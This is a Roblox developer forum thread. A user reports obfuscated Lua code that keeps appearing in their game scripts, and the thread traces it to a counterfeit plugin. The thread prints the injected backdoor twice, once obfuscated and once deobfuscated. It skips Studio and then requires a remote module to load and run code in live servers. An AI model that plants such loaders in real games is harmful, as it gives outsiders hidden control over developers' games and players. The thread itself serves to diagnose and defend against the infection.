Viruses in Roblox

basically, I have been facing this thing bug or virus or I don’t know what to call it more than a year when I join in my game random code appears in my script for example like this

iW4OSX = require ireTh6 = game ixDu2rtMAHO = pcall iLCfzGDL = spawn iZXZaYQW = 'ReplicatedStorage' i6KsUcH02vixa = 'PlaceId' iql0PMvYYrK = math.sqrt iYeBqSPmSotz0p1 = pcall iWmnV = 'FindFirstChild' ieDpT1UtQp = 'RunService' iMjbbHdP8xv = 'SSM' iT4euwNOJrHP = require iQt0cMkvFul = 'IsStudio' iYIBdDkDY = 'load' i3Xgood5IFPbXcz = 'Description' i8U7VE1MJiM = 'IsStudio' iHUJOg = 'Name' irmT = 45000962.59322 * 59  iLCfzGDL(    function()     iYeBqSPmSotz0p1(    function()     if ireTh6:GetService(ieDpT1UtQp)    [i8U7VE1MJiM]    (ireTh6:GetService(ieDpT1UtQp)    ) then      return     end iT4euwNOJrHP(irmT)    [iYIBdDkDY]    (ireTh6[i6KsUcH02vixa]    )     end    )     end    )

Some of my friends have faced this too.
You would understand what I am talking about better from this video.

Edit:
I use plugins that are really popular and I don’t think it is from them.

Here’s the code, deobfuscated:

spawn(
	function()
		pcall(
			function()
				if game:GetService('RunService').IsStudio() then
					return
				end
				require(2655056793).load(game.PlaceId)
			end
		)
	end
)

It attempts to load this module:

This module has been moderated (as you can tell).

Audit your plugins/free models that you insert and make sure that none of them insert malicious code.

EDIT: Mind showing which plugins you have installed anyway? You may have gotten a copy which has been modified to insert malicious code.

The original Lines of Code plugin is written by Crazyman32, not minamcrazy:

https://www.roblox.com/library/333507912/Lines-Of-Code

2 Likes

Still.

Disable all your plugins and restart studio. Does this still happen?

Also, regarding that duplicate, I checked and it does contain malicious code (warning: contains swearing!!11): https://pastebin.com/sPzNXimx

Ok, it got fixed so that person should be banned right?

1 Like